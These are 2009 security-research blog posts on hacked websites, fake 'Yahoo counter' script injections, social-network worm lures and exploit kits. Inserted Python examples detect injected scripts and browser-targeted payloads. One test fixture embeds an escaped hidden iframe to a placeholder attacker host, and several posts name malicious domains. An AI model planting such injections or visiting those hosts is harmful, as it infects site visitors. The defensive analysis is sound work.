Tuesday, September 15, 2009

Ok, now that was interesting!

Over the weekend, several people noticed attacks originating from a malicious ad placed at nytimes.com. Viewers were redirected to what we call a fake, or rogue antispy page, where the webpage _pretends_ to scan your computer, and then tries to convince you to install some nifty antivirus program to clean it up-oh-but-you-have-to-register-first-put-your-credit-card-here-mr-victim. Nothing new there... it's the most common thing we see _every_ day.

We've been watching this particular style of rogue attack since about March, and just happened to have them under the microscope over the weekend, and here's the interesting thing... normally, we see 10-15,000 such detections each day, but from about last Thursday thru Sunday, it spiked to 160-170,000 per day. It dropped off today to about 20,000.

The attacks seemed to come from two main types of lures, with the first being advertisements, including the fake one on nytimes, and lots of Flash banner ads, and the second being searches for "newsie" events like Kanye and Taylor, and Patrick Swayze, and Serena Williams.

It's ever so impressive how quickly they not only react, but also point the news search results at their hijacked lure machines. In other words, not only are they quick to react to something newsworthy, but they are somehow able to get their hijacked machines right up to the top of the google and bing searches. These guys are flat-out clever.

In summary, not only was there a huge spike in activity by this particular group (or groups), but they quickly were able to manipulate the search engines.

It goes without saying that LinkScanner is able to detect and block these attacks, but it's a dangerous Web folks.

Keep safe,


Saturday, July 11, 2009

I think I know what the ddos is about

If you've watched any news broadcasts since the 4th of July, you'll be aware that certain US and South Korean government and commercial websites have been under Distributed Denial Of Service (ddos) attack. Early on, someone pondered for a minute or two about who might be a common enemy to both the US and SK, and the obvious answer was .... gasp... North Korea!!! And if NK is the perp, then clearly this is ... cyberwar!!! Holy Moley Batman!!!! Quick ... run to the bunkers!

It's obviously a great headline, but most actual security folk took the view that it's just a ddos, for goodness sake. If we can't get to Whitehouse.gov for a few days, the world is not going to end. The tourists will still take their photos from the street, and the rest of us will just get another cup of coffee while we wait for it to end. Ddos's are really easy to do, and impossible to prevent up front. It's just that they're not profitable, so no one bothers in this day of "Show me the money for my malcode". And it was silly to blame North Korea, because the whole point of a ddos from a remote controlled botnet is that no one really knows who's driving it.

Now, having had a look at the disparate list of victim websites, my initial thought was that it was a disgruntled businessman targeting the Federal Trade Commission, and shooting at everyone else to conceal their real target, but then we realized that the malcode was programmed to self-destruct, starting July 10th, by erasing the first megabyte of the victim's hard drive!

At least this would effectively clean up these computers.

After we got over laughing about botmasters destroying their own botnet, and making jokes like "Don't these guys understand how retaliation works?", etc, the light slowly dawned on us that maybe they did understand exactly what they were doing.

It's not cyber-war ... it's someone who's worried about the growing plethora of botnets on the Internet, and who's trying to make people care enough to do something about it! A vigilante!

Think about it.

Why bother nuking 60k computers after doing all the work of assembling them? Nuking them only helps the Good Guys, because the victims are forced to re-build, and therefore clean, their computers.

Why bother with a ddos of a bunch of disparate government and commercial websites? Nobody was really impacted ... border routers were reprogrammed to deflect the ddos off any important sites... the only thing it really did was cause a bunch of lawmakers to point the finger at North Korea.

And the only other thing it really did was make lawmakers think "If North Korea could do this with a mere 60k machines, what could Al Qaeda do with a big botnet of 300k machines?"

Big botnets are really common, by the way.

The only reasonable explanation for the whole thing is that it was someone who is worried about the botnet problem, and who wanted to make lawmakers think about it, and do something about it.

A high-tech vigilante.

By the way, the vigilante has a point. Botnets are a real problem, and we need to mitigate them a bit. Most ISPs could do something, except that their give-a-darn bone is broken.

Incidentally, the erase-one-mb thing reminds several of us of the CIH virus. The underground scuttlebutt about the CIH author was that he was hired by Taiwanese military intelligence. It's an easy mind-wander to wonder if there's a connection there. Surely not. :-)

Keep safe folks.

Thursday, June 4, 2009

Unfortunate brand squatting

Hi folks,

A common practise among enterprising webmeisters is what's known as brand-squatting. That's where you find a domain whose owner has neglected, or not bothered, to renew it, and it's up for grabs. If you get something modestly popular, then you get the benefit of whatever residual traffic they've generated as a starting point. Makes sense for most domains.

This time, however, someone re-registered and re-vitalized one of the most notorious brands in malcode history .... coolwebsearch ! :-) :-) :-)

Not only that, but while it was a search-enginey kind of page, it was also hosting an exploit!!! Whether that was deliberate or accidental is not clear, but it doesn't matter much as it's down now.

coolwebsearch.us was registered on about the 18th of April 2009, and our first detection was 24th April. Our last was yesterday, but as this graph shows, activity has been tapering off anyway.

Here's a graph of the detection events our users told us about.

As you can see, we had about 11,000 hits spread over 40 days, across 106 countries.

It's a dangerous internet folks, but at least it's sometimes funny.

Keep safe,


Please follow me on Twitter

Monday, May 11, 2009

Here's a whoopsie to start the week.

*** don't go to any of these websites... they seem safe today, but you can't be certain, and it's better to avoid them ***

It's just a simple (and common) script injection, but the victim is kind of interesting. Seems like none other than the City of London website has poor security. :-)

As usual, the page itself renders just fine, and looks like this ...

but if you have a look at the source, you see something like this ...

If you look closely, you see references to URLs like 4log-in.ru, and in fact there are eight different ones...


(again, don't go to these places unless you know what you're doing, because you might get nailed)

What this means is that the City of London website has been nailed, not once, but _eight_ times.

Fortunately, the site is seemingly not infective, so the injections have only partly worked, but then again, it might depend on what you click on the page, and there might well be other hacked pages that we've not discovered yet.

What needs to happen is that the injections need to be removed, and the City of London webmeisters need to find the form that is allowing the injections, and fix it.

It's a dangerous Internet, folks. Keep safe.



Saturday, April 4, 2009

The gift that keeps on giving

So... years ago, I wrote a program called WormRadar. It was designed to detect and measure the malware of the day, worms. More recently, the web became the main attack vector, and we started building programs to detect and measure that activity (which is where LinkScanner came from), and WormRadar gradually fell into disuse. Really recently (as opposed to more recently, and yes, my old English teacher wants to rap my knuckles for that), we cranked up a WormRadar node again, just to see what new things were circulating, and the number one thing we're detecting is .... Slammer!!!!!!

Now, many readers will already see the funny side of that, but many will also not, so for the "nots" ... SqlSlammer was a worm that appeared in January 2003, and really hit the Internet hard. That was pretty amazing at the time, because it exploited a vulnerability that had been patched as MS02-039... _six_ months earlier. In other words, although a patch had been released for six months, so many people had not patched that the worm was able to be a major spreader six months later.

Then, in 2004, Microsoft released XP Service Pack 2, in which the firewall was on by default for the first time, and this was really an Extinction Level Event for most worms, because even little old Windows firewall is enough to stop all worms. There have not been any worms since then that can force their way thru the firewall from outside. Conficker, for example, relies on getting inside the firewall by some other method... USB drive... social engineering ... whatever... and then runs rampant inside a network, but it can't _force_ its way in.

This then, is the amusing and amazing thing about Slammer... it's still alive and well six _years_ after its first appearance, which is six _years and six months_ after the patch was released!

In other words, there are computers which are just never patched!!!!

There is a name for this type of user .... Victims!

Keep safe folks! (Oh, and keep patched! ;-))


Tuesday, March 31, 2009

The imminent demise of the Internet ...

is being greatly exaggerated, in case you haven't figured it out by yourself.

What's happening is that people are worried because the Conficker worm is due to do "something" on Apr 1st, and no one knows exactly what. Human nature being what it is, some folks are fixating on the worst possible outcome. It'd be pretty bad if you got hit by a meteor too, but no one is building meteor shelters.

There are two main issues to consider here. The first is that Conficker is a pretty well-thought-out attack, and it's pretty unlikely that they want to do anything but make money for their efforts. It's not in their, or anyone's, interests to try to kill the Internet. They can't make money if they do that. They don't want to chop down the apple tree... they just want to shake it and pick up the apples that fall off.

The second is that this is a government/ corporate/ education problem... not a consumer one. The two main vectors for spreading are a vulnerability in a service called RPC, which was patched in October 2008, and poorly protected network shares. The only people that have networks and who also don't patch are government, corporate and education users. Fortunately, they're also the folk that have staff with expertise that they can call on to fight back. The worm probably grabbed millions of users right out of the box in December 2008, but any gov/ corp/ edu user who is still infected after five months deserves it. On the other hand, Joe the Plumber almost certainly allows automatic patching each month, and probably doesn't have much of a network, and presents a much smaller target.

Yes, some of Joe's friends will have been nailed by now, by infected USB keys or something, but it's not going to be a massive number of users. The conficker botherders will simply have achieved their goal of building a fairly bullet-proof botherd, and will now "farm" that botnet, while they prepare their next attack. (We will see things like this again, so now would be a good time to upgrade to AVG identity protection ... it'll provide a good safety net for the next attack)

By the way, I think this is a fairly predictable consequence of playing whack-a-mole with botherds. All you do is cull the weak ones from the herd, and encourage the smarter ones to build a stronger botnet.

All in all, I think the date of April 1st is entirely (if accidentally) appropriate.

Keep safe, folks.


Saturday, March 28, 2009

KoobFace, Facebook and Classmates... oh my.

Hi folks,

So, the March pitch from KoobFace seems to be bigger in scope...well, that's if you can derive stats from a sample-base of one, because I've personally received three pitches this time... One for FaceBook, and two for Classmates.com... but the basic pitch is the same.

It comes as an email along these lines ... : "Girls in beautiful black underwear dancing in the pub, showing off perfect bodies. Unbelievable Final!".

If you go to the webpage in the email, it looks pretty much like the site is Facebook or Classmates, because the fake site draws a bunch of content directly from the real site, like this ...

and, of course, the aim is to get you to download a fake Adobe update, which is really the worm.

Of course, if you look at the url in the browser bar, it is obviously not really FaceBook, but that's not the point. They don't expect to fool everybody .... they just want to fool enough bodies.

And, of course, it goes without saying that LinkScanner detects and blocks the fakes just fine.

Oh, and I am kidding about deriving stats from a sample-size of one. :-)

Keep safe folks,


Monday, March 16, 2009

One website cleaned ... many more to go

Hi folks,

Just a quick note to share that the hacked page at phoenix.spelthorne.gov.uk has been cleaned, and no longer displays "Fatal Error ownz you" and is no longer redirecting to sites in Turkey.

We have, however, found lots of other .gov.uk websites with hacked and (sometimes) infective pages, which we'll blog about shortly.



To be notified of updates to this blog, please follow me on Twitter

Thursday, March 12, 2009

Oh goody! City of Streator has a Yahoo counter!

The page looks quite normal, except that LinkScanner knows better and has told us that it contains a fake Yahoo! counter, and if you look at the source, sure enough you see this block of code ...

As readers of this blog will know, one of the more commonly-encountered web tricks is a Yahoo-counter-that-is-not-a-counter. Instead of counting visitors, it reaches out to an exploit site and ... counts victims.

This gang's specialty is to hack into an innocent website, and turn it into an unwitting lure... all the website's visitors are probed by the villains, and if they're vulnerable... wham! the visitor is a victim of a drive-by download.

Here's a sample from today's hack list. (*** AGAIN.... DON'T GO TO THE PAGE ... IT MIGHT BE STILL INFECTIVE ***)

This page, hxxp://www.ci.streator.il.us/cms/index.php?page=fire-department-faq-s, looks like this ...

If you look closely at the code you see not one, but _two_ yahoo counters! How exciting! This means they've been whacked not once, but twice. :-)

And sure enough, if we look at the critical files list, we see the start of an infection cycle...

I find that outing a site on this blog is actually the best way to get it cleaned up. It's much more effective than me trying to explain to confused support staff, so c'mon City of Streator guys.... please clean your site, and fix the hole that allowed the Bad Guys in in the first place. You're probably running a vulnerable php tool or version.

Readers, please remember that City of Streator is an innocent victim too... they didn't mean for this to happen, but they do need to fix it.

Look both ways when crossing the web, folks.... it's dangerous out there.


Ps to be notified of updates to this blog, please follow me on Twitter

Monday, March 9, 2009

There's a bit of bad luck!

*** WARNING - This website is probably still hacked and infective, so please don't go there unless you really know what you're doing***

A couple of days ago, LinkScanner started detecting (and blocking) a page of a UK gov website, so we thought we'd take a look. This is the screen we were presented with ...

The "Fatal Error ownz you" is a fair clue that something is not quite right here. ;-)

While reading that, you are quickly and automatically redirected to this website ...

I'm reasonably confident that a Brit government website shouldn't be transferring you to (what I think is) a Turkish one, so this is a fair second clue that something is wrong.

Once we establish that a site is hacked, we like to see how long it has been hacked, because mostly it's quite a quick thing ... most sites get hacked and cleaned up in under a couple of days... The best way to find out is to look at the search engine cached pages, so we had a look at the google cache, and to our surprise, we saw this page.... (again, don't even go to the cached pages, unless you know what you're doing, because if the page was infective when the search bots indexed it, it'll still be infective in the cache) ....

On January 24th, when the google bots crawled by, it was hacked again, by a different crew! That's what's known in the biz as a Bit Of Bad Luck (tm) !

So, just to be sure that they are not serially and constantly hacked, we consulted two more caches... The msn Live cache snapshot was taken on March 4th, and shows it clean...

and the ask.com cache snapshot was taken on January 7th, and it was clean then too.

The webmasters are obviously cleaning things up as quickly as they realize they have a problem, but seemingly have yet to plug the hole that the Bad Guys are using to get in. It just shows how tricky it is to keep your websites clean, and it shows how pointless it is to blacklist websites via a central database... it's always too slow to realize something is hacked, and too slow to realize it's cleaned up.

Stay safe folks,


To be notified of blog updates, please follow me on Twitter

Friday, March 6, 2009


Hi folks,

I've just realized that I didn't make it clear that this post is actually about KoobFace.



Wednesday, March 4, 2009

UsAid site hacked and infective

Hi folks,

The usaid.gov site for Azerbaijan is hacked and infective. _DO NOT GO TO THEIR SITE_. We made a vid to show what happens, because that's much safer than visiting, and it is viewable here...

Screen shots are a little bit blurry this time ... sorry about that... we've changed our screen resolution for captures and it didn't quite work out, but you can still get the idea.



Monday, March 2, 2009

Watch out for fake FaceBook emails

Today, one of our old friends, Mark Coker got three different emails purporting to be about Facebook. He twittered about it here and asked me what it was about.

He actually got three emails, all in short order, with this subject (remember, future attempts will have different subjects) ...

Review - My family invite you out for lunch, don't hesitate!

And if you click the embedded link, you're taken to a fairly convincing looking facebook page...

Notwithstanding the funny looking url that I've circled in red, the rest of the page looks convincing. If you are alert enough to look at the url, then you know you're not at a real FB page, but as I've often said, they don't want to catch everyone... they don't want to cut down the apple tree... they just want to shake it and pick up the apples that fall off.

If you click anywhere on the image, you get the "pitch" screen, that looks like this...

and then you get a convincing looking adobe download dialog. Given the number of recent Adobe updates, this will catch a bunch of folk, and they will indeed run the installer. This approach, by the way, works no matter how well you are patched, and probably even works if you are running full-blown UAC in Vista....

If you run it, of course, you no longer own your machine. It belongs to them, because it installs a rootkit....

This one is worse than most, because once it runs, it's subtle... it doesn't pop up messages asking you to install some antispy ... it's just _got_ you.

Remember, as the economy worsens around the world, the Bad Guys are more motivated than ever to get into your pc.

Keep safe folks,


Wednesday, February 25, 2009

It's _not_ a Yahoo counter!

One of the most common complaints we get is when a webmeister or user thinks we're unjustly accusing a website of being evil, and, without sounding immodest about it, we're usually right. The way LinkScanner works is that it makes its evaluations in real time ... it looks at the code as it comes off the webpage, and decides if things are dangerous or not. That's as opposed to those systems that rely on a central database, which is usually too slow to realize that something is dirty, and then too slow to realize it's been cleaned up.

A typical example is the fake Yahoo counter that looks like this ...

That's the source of a typically hacked page. You see the bit about "Yahoo counter starts" ? Guess what... it's _lying_! It actually decrypts to an iframe link to an exploit site, but you wouldn't believe the number of conversations I've had that go like this...

Ring, ring... me, "Hello, could I speak to your webmeister please?"
Shuffle, shuffle, switching thru ... webmeister, "Hello?"
me, "Hi, I'm sorry to have to tell you this, but I'm a security researcher, and I have to tell you that your website has been hacked."
webmeister, "Sorry... what ... who is this?"

and then we have many chats about who I am, and how I know, and eventually it gets to the point where they say "Show me", so I show them the code on their page, and they say "But it's a Yahoo counter!"
and I say "Did you put it in?", and they say, "Well, no, but one of the other guys must have"


Sometimes they believe me, but mostly they don't.

Here's the bottom line folks. I have yet to see a genuine Yahoo counter. They may exist, but they sure don't look like that, so if you're a webmeister with code like that in your pages, please delete it. Unless you put it there, it's fake.
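The posts above (this one, the City of Streator one, and the City of London script-injection one) all describe the same thing from a webmaster's side: a marker comment claiming to be a "Yahoo counter", an inline script that unescapes and writes out a hidden iframe to somebody else's domain, or a batch of injected script references pointing at hosts that are not yours. Here is an added example, not LinkScanner code or anything from this blog, of a small Python checker a webmaster could run over a page's source to surface those indicators. The sample page and every host in it (`counter-a.invalid`, `sql-inject-b.invalid`, `sql-inject-c.invalid`, `www.example-city.invalid`) are constructed placeholders, and the regexes are my own choice of indicators, not a signature set from any product.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

# Constructed sample of a "hacked" page: a fake-counter marker comment, an inline
# script that document.write()s a %-escaped hidden iframe, and three injected
# remote <script src> tags spread over two hosts. All hosts are *.invalid
# placeholders, not real domains.
SAMPLE_PAGE = """<html><head><title>Fire Department FAQ</title>
<script type="text/javascript" src="/js/site.js"></script>
</head><body>
<h1>Fire Department FAQs</h1>
<!-- Yahoo counter starts -->
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fcounter-a.invalid%2Fin.cgi%3F3%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'))</script>
<!-- Yahoo counter ends -->
<script src="http://sql-inject-b.invalid/x.js"></script>
<p>How do I reach the department?</p>
<script src="http://sql-inject-b.invalid/y.js"></script>
<script src="http://sql-inject-c.invalid/z.js"></script>
</body></html>"""

MARKER_RE = re.compile(r"yahoo\s+counter", re.I)                      # the lying comment
OBFUSCATION_RE = re.compile(r"\b(unescape|eval|String\.fromCharCode|document\.write)\s*\(", re.I)
QUOTED_RE = re.compile(r"""['"]([^'"]+)['"]""")                        # string literals in a script
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\ssrc\s*=\s*['\"]?([^'\" >]+)", re.I)


class PageScanner(HTMLParser):
    """Collects marker comments, inline script bodies and external script/iframe refs."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.in_script = False
        self.markers = []          # comment text containing the fake-counter marker
        self.inline_scripts = []   # bodies of <script> blocks that have no src
        self.remote_refs = []      # (tag, url) for script/iframe pointing off-site

    def note_ref(self, tag, url):
        host = urlparse(url).hostname
        if host and host != self.page_host:      # same-site and relative refs are expected
            self.remote_refs.append((tag, url))

    def handle_comment(self, data):
        if MARKER_RE.search(data):
            self.markers.append(data.strip())

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.in_script = "src" not in attrs
        if tag in ("script", "iframe") and attrs.get("src"):
            self.note_ref(tag, attrs["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and data.strip():
            self.inline_scripts.append(data)


def decode_written_markup(script_body):
    """Decode %XX-escaped string literals (the unescape()/document.write() idiom)
    and return the markup they expand to; a fake counter usually hides an iframe here."""
    return [unquote(lit) for lit in QUOTED_RE.findall(script_body) if "%" in lit]


def scan_page(html, page_host):
    """Return the indicators found on one page plus the distinct off-site hosts it pulls from."""
    scanner = PageScanner(page_host)
    scanner.feed(html)
    scanner.close()
    findings = [("marker", m) for m in scanner.markers]
    for body in scanner.inline_scripts:
        prims = sorted({p.lower() for p in OBFUSCATION_RE.findall(body)})
        if prims:
            findings.append(("obfuscated_script", ",".join(prims)))
        # Decode what the script would write, then look for the iframe it hides
        for markup in decode_written_markup(body):
            for src in IFRAME_SRC_RE.findall(markup):
                scanner.note_ref("iframe(decoded)", src)
    findings.extend((f"external_{tag}", url) for tag, url in scanner.remote_refs)
    hosts = sorted({urlparse(url).hostname for _, url in scanner.remote_refs})
    suspicious = bool(scanner.markers) or any(k == "obfuscated_script" for k, _ in findings)
    return {"findings": findings, "external_hosts": hosts, "suspicious": suspicious}


if __name__ == "__main__":
    report = scan_page(SAMPLE_PAGE, "www.example-city.invalid")
    for kind, detail in report["findings"]:
        print(f"{kind:22} {detail}")
    print("distinct off-site hosts:", report["external_hosts"])
    print("suspicious:", report["suspicious"])
```

The list of distinct off-site hosts is the part to read first: a page that pulls script from hosts the webmaster never chose has been edited by someone else, however innocuous the comment around it claims to be, and the count of distinct hosts is how you tell "hacked once" from "hacked eight times".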

Keep safe


Btw, to be notified of blog updates, plus little extra bits that don't make it to the blog, please follow me on twitter

Sunday, February 22, 2009

Off-topic (but I think it's a neat story)

Hi folks, this is completely off-topic, but I've been chewing on this for a few days, and feel I should share it...

A few days ago, I took three of my little girls to ballet, and in the middle of the class, the tornado sirens went off. The teachers got all the kids into the safest place in the building which was a hallway, and got them to sit down... all by the book.

Then the neat part happened...

One end of the hall was sort of open, and faced the windows .... obviously the most dangerous thing if a tornado did hit. Without anyone saying anything, the moms who were waiting for the kids sat between the kids and the windows, and the two dads, (me and another guy) interposed ourselves between the moms and the windows, thus taking the most dangerous spot. No one said anything, or talked about it ... it just all happened naturally.

The parents stayed calm, and the kids stayed calm, and the tornados went south of us, so they went back to ballet, and the parents went back to chatting aimlessly.

About an hour later, I thought about what had happened, and realized that something nice had occurred. A bunch of strangers had naturally come together, without anyone saying anything, with the adults protecting the kids, and the men protecting the women.

In these days of terrible economic uncertainty, I found it heart warming to find that the natural inclination of a group of strangers was to protect the weaker ones.

We can, and will pull thru this, folks,



Thursday, February 19, 2009

I didn't say that, I _promise_

Ok, I'll admit it ... I google-alert my name. It's not as bad as it sounds, because I google alert lots of things. It's surprising to see how many people are named Roger Thompson, and it's even mildly amusing to see some of their professions, but that's a story for another day. Today, however, I got this alert...

"Even in spite of this it was a relatively benign episode as worms bearing of walking, Grey Goo is cost note, as it may be only the best ancient of this brand of malware for the future, warn Roger Thompson, CTO of anti-exploit software ..."

Now, I do like the occasional glass of shiraz, but I'm fairly confident that, even after a whole bottle of shiraz, I never said that. Heck, I can't even parse it.

It was in a blog whose identity shall remain private to protect the innocent (which may be all of us in this case), and a quick bit of searching found a second blog that opens with this amazing statement...

"A exotic resistant decisive against protecting computer user and business antagonistic zero-day attack aware to that occurrence exploit belt users' frozen drive launch a interview variation of its opening goods on Monday.", in an interview also attributed to me.

Although it was posted today, it was under a heading of "Antispyware pros launch SocketShield beta", which gives a bit of a clue, because that happened in early 2006, but I'm pretty sure I never said that either.

In fact, both blogs were full of incomprehensible and un-parsable English just like that. It looks like someone is picking up old articles, and translating them to non-English, and then back again... twice or more.

But the question is ... why bother? And my answer is ... I have no clue! What's the point? The blogs don't appear to be malicious as far as I and my software can determine, but who knows what might happen in the future?

As funny as the entries are, I think the best idea is simply to regard them as potentially dangerous, and stay away. In other words, if you are googling for _anything_ and the summary that comes up on the search page doesn't make sense.... treat it like a crazy looking stray dog that might bite, and go to a different site.

Stay safe folks!


PS Please follow me on twitter

Tuesday, February 10, 2009

Storm is dead ... long live storm

Today I looked at a Valentine's Day eCard scam, and it was like unexpectedly bumping into an old friend...

I got this URL, yourgreatlove.com (**** DON'T GO THERE!!!!! IT MIGHT BE STILL LIVE AND DANGEROUS**** ) from the malwarebytes forum (malwarebytes.org/forums/index.php?showtopic=11109) , and given that it was valentine's day malware, I thought I'd take a closer look, and I saw this screen...

I thought "That's Storm!... Haven't seen that for ages". Now, it might well have been around and I just haven't been paying attention, and I'm pretty sure it's what most people call the Waledac botnet, but it was fun to think "Oh, I know what you are!"

They've updated their crypto and their exploit set, but they still try to trick you into downloading something if the exploits don't get you first, and here's the current exploit list that they throw, hoping something will stick ...

Outlook Application
Vis Studio
MS Dbg Clr
Vis Stuidio DTE
Vis Studio
Microsoft Update Web Control
Outlook Data Object
Business Object Factory
NCT Audio File
Yahoo webcam/Messenger - June 2007
Real Player - March 2008
Creative Labs - May 2008
CA List Ctrl
Yahoo webcam - June 2007
Kingsoft update ocx - Apr 2008
MySpace uploader ocx - Feb 2008
WebEx mtg manager - Aug 2008

Of course, if they nail you, you become part of the botnet, as well as giving up your identity and bank account.

Anyway, it was a deja vu moment. These guys show a pretty fair understanding of current events, and US holidays, so the next thing we'll probably see is an Easter version, unless something newsworthy happens... disaster photos of Australian bushfires maybe?

Keep safe folks,


My wife and son have managed to get a song in the final 15 for the annual NSAI Country Music Television awards. This is out of several thousand entries. They have two chances to win. The first is the judged portion, which is conducted by CMT.com themselves, but the second is a public vote. It's a big opportunity for them.

Their song is "I found everything" by Kate and Ben Thompson, and you can vote for them (as often as you'd like) at http://nsai.cmt.com . I've resisted the temptation to enlist a botnet :-) but would like to help them win.

Please consider voting for them, and please ask five of your friends to.


Thanks in advance


Thursday, February 5, 2009

Guess what should be blocked next? :-)

*** Warning! DON'T go to any of these sites***

One of the longer-lived attack sites is thedeadpit. This first graphic shows the attack profile, showing a peak of about 1500 hits per day. (You can click any of the images for a larger view)

And then, after a while we started seeing the same stuff come from internetcountercheck. The attack profile shows a recent peak of about 4000 hits in one day. This is kind of interesting, and probably reflects a marketing push on their part.

It turns out that there are five domains on their domain name server, and look ... today the third one is starting too :-) ...

and here are the rest of the domains on the domain server...

So, as you can see, it's a case of three down, two to go. If anyone likes to block URLs, these would be a couple of good ones to add.



Monday, February 2, 2009

Firefox / El Fiesta mystery solved... well, sort of

One of the most common attack kits (that we see and block every day) is El Fiesta. It is frequently updated, and according to reports, pretty cheap.... generally a fair formula for success in any part of the software biz. It has a neat statistics page that keeps nice stats like which countries it has seen, and how many successes (or loads) it has managed in each country.

It also tracks the browsers it has seen, and tracks its successes against each browser. At the bottom of the statistics page, it shows how well it has done with each exploit.

The first interesting point here is that it shows 67 loads against FireFox 3.5, which is impressive, and even more interesting is that the summary shows two FF exploits ... a FF NS Local, and a FF Behavior.

This led us to wonder what they might be, and in particular, just what was the FF Behavior trick?

At first, all we could get it to do was to throw fairly common PDF exploits at FireFox, which all failed, but then, after certain components were updated just right, we suddenly got this screen that wants to update the page....

Now, if you click ok for the update, and then run the update, you get this old friend ...

Gosh, you've got spyware.... whoda thunk it? Now, I'm not saying it's a great trick or anything, but as the stats page shows, it works. Remember, these guys don't want to cut down the apple tree... they just want to shake it, and pick up the apples that fall off.

We'll keep trying to figure out exactly how they're doing it, just for grins, but there are two other mysteries that we stumbled across while trying to solve this one, so we'll see what happens.



Thursday, January 29, 2009

A view of the recent google video attack

Hi folks,

Dancho Danchev blogged here about an inventive new way Bad Guys were luring people to innocent videos but then redirecting them to an attack site, which would then try to trick them into installing something bad. Dancho says they'd managed to hijack 400,000 search terms, so it's quite a big attack. We detect and block the way they attempt the trickery, so we were blocking it preemptively, but it's interesting to look at our graph of the attack...

Our first detection was on January 19th, and it jumped to between 200 and 250 a day up until January 27th, when it took a sharp drop and just about disappeared on the 28th. So here's the interesting bit ... a whois lookup of the attack domain shows that it was registered on January 19th, which means we started detecting it the same day they brought it on line... and then Dancho published his blog on January 27th, and the attacks diminished dramatically on the same day (probably because he also told the security team at google on the same day, and they started cleaning out the search pages)

Now, you might be tempted to think that a couple of hundred attacks a day for not much more than a week was not much of a payoff for hijacking 400,000 search terms, but it's important to understand that this is just measuring the attacks from a single domain. They probably had lots more than that. These guys are pretty smart, without a doubt.

I don't know about you, but I think it's pretty cool when you can see data like this, and even cooler when you can explain why it's happened.




Tuesday, January 27, 2009

Obama worm? ... nah, surely not

I don't often get to work at the coal face much anymore (which is a shame, because I'm a coal-face kind of guy), but today I had that privilege. One of our resellers, Walling Data, called me and asked if I knew of any malcode that displayed a picture of President Obama. While I could see the funny side of that, no matter what your political persuasion might be, I had to admit that I had not, but here's a screen shot to show you what these folks were seeing....

I'd be happy to think it was just someone's prank, except for these facts...
(1) The victim is a school, with about 100 pcs
(2) It appeared on all pcs at about the same time
(3) The pcs have file sharing enabled
(4) It's not clear if all pcs are patched.

We're still investigating it, but Occam would suggest that it is what it seems ... a worm. Probably not a conficker variant, because as far as we can tell, the source code is not available for Conficker, but probably something exploiting ms08-067.

Anyway, we'll keep investigating, and will let you know what we find.



PS: Note to school admins: Given that Conficker source is probably not available, and if no one else ends up reporting this, there's some chance one of your students wrote it. Find your smartest, geekiest, dweebiest kid, and look hard at him. Remember, the geek shall inherit the earth.

PPS: Despite all the press, and the large number of victims that Conficker has recently gained, it's worth noting that this is probably a corporate and edu problem rather than a consumer problem. The only people this should really have caught are those that (1) haven't patched a two-month-old vulnerability and (2) allow file sharing. These are corporates and edus. Consumers, for the most part, allow automatic patching each month, and any consumer naive enough to allow file sharing got nailed a long time ago. This assertion is supported by the fact that, within our client base (mostly consumer and smb), we've had very little detection of it. It's also worth noting that if the perps really did nail 9 million victims, they defeated their own purpose anyway, because they DDoSed themselves instantly. Have you got any idea how long it would take to enumerate 9 million pcs over the Internet? They're still on the first pass, for sure.

Saturday, January 24, 2009

Something interesting tonight (and, boy, we have a great community)

Hi folks,

One of our friends, a security guy at the IRS, noticed a new fast-flux botnet today serving up exploits, and Nick FitzGerald, a well-known anti-malware guy, investigated a bit further and found that the exploits were being fired based on which browser the visitor is using.

If you're using Internet Explorer, for example, it shoots a bunch of common IE exploits. Nothing too new here, so if you're patched, you're fine, but one interesting bit is that it looks to me like it's been lifted from a decrypted Neosploit, and tweaked a bit.

If you're using Firefox or Opera, it shoots a specific exploit for FF or Opera, and if you're using Chrome or Safari, it fires some generic pdf exploits at you.

The encryption technique is new, and a bit cute in the way that it is hooked into the html, presumably to try to avoid decryption emulators.

Oh, and if it succeeds, it installs a fairly new rootkit, which AVG detects as an Agent variant. Oh, and from Russia, too.

So the first interesting thing is that it shows that the Bad Guys are constantly thinking and innovating and probing, but the second, and more important thing is that it highlights how well the anti-malware community cooperates, mostly unnoticed and unappreciated, behind the scenes.
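Since the exploit kit above hands each browser a different payload (and the "FF Behavior" post further up describes the same kind of browser-conditional serving), the quickest way to confirm that a suspect URL behaves this way is to fetch it under several User-Agent strings and compare what comes back. The following is an added example written for this post, not code from the original or from AVG/LinkScanner; the User-Agent strings, the content markers, the URL and the stand-in responder are all constructed assumptions for illustration, and a real probe would swap in the live fetcher.

```python
"""Probe a URL under several User-Agent strings and report whether the server
serves browser-conditional content (added example, not the blog's own tooling)."""
import hashlib
import re
import urllib.request
from collections import defaultdict

# Constructed User-Agent strings for the browsers the post names (assumption:
# period-typical strings; any current ones work the same way).
USER_AGENTS = {
    "ie": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "firefox": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5",
    "opera": "Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1",
    "chrome": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19",
    "safari": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1",
}

# Crude, constructed markers for the payload styles the post describes:
# PDF delivery, ActiveX/object instantiation, and escaped/obfuscated script.
MARKERS = {
    "pdf": re.compile(r"\.pdf\b|application/pdf", re.I),
    "activex_or_object": re.compile(r"<object\b|new\s+ActiveXObject|clsid:", re.I),
    "escaped_script": re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.I),
}


def fetch_with_urllib(url, user_agent):
    """Live fetcher: one GET with the given User-Agent, raw bytes back."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def probe(url, fetch=fetch_with_urllib, agents=USER_AGENTS):
    """Fetch `url` once per browser and summarise each response."""
    results = {}
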